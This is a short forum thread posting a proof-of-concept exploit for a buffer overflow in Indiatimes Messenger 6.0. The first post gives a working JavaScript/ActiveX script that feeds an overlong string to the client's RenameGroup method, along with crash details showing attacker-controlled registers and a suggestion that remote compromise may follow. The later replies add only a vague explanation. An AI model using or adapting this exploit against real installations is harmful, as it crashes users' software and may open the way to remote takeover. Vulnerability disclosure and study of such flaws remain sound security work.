Indiatimes Messenger 6.0 Buffer Overflow Indiatimes Messenger 6.0 Buffer Overflow

[sunny 0]

[CODE]Indiatimes Messenger 6.0 Buffer Overflow (Remote)Vulnerable Program : Indiatimes Messenger v6.0(Latest)Vendor URL : http://messenger.indiatimes.com/Exploit Type : Remote DoS (Remote Compromise may alsobe possible)Proof Of Concept:[script]var obj1 = newActiveXObject("MMClient.MunduMessenger.1");var buf = "";for(i=0; i<1000; i++){  buf += "A";}while(obj1.GetServerStatus() != "Logged In"); //waittill loginobj1.RenameGroup("Friends", buf, 5);[/script]The program (MMClient.exe) crashes @ 004B681B   8979 04          mov dword ptrds:[ecx+4],ediwith registers ecx, and edi = 0x41414141[controllable]So, remote compromise maybe possible (not confirmed).

[Saint_Michael 3]

you should explain the reason for this code, it doesn't do one any good if you just slap a code and not explain it.

[sunny 0]

Explanation: Indiatimes Messenger is a communication client application just like Yahoo! messenger. the indiatimes messenger is used by site: http://www.indiatimes.com/ as usual.

 

Indiatimes.com also has some issues with their web site. like in registration process. but that is a different story.

 

Anyways, Indiatimes Messenger shows some problematic behaviour on certain conditions. Which may lead to buffer overfloaw and thus also result in Remote compromise.

[Saint_Michael 3]

and so this code should help out those who use this program then? not bad.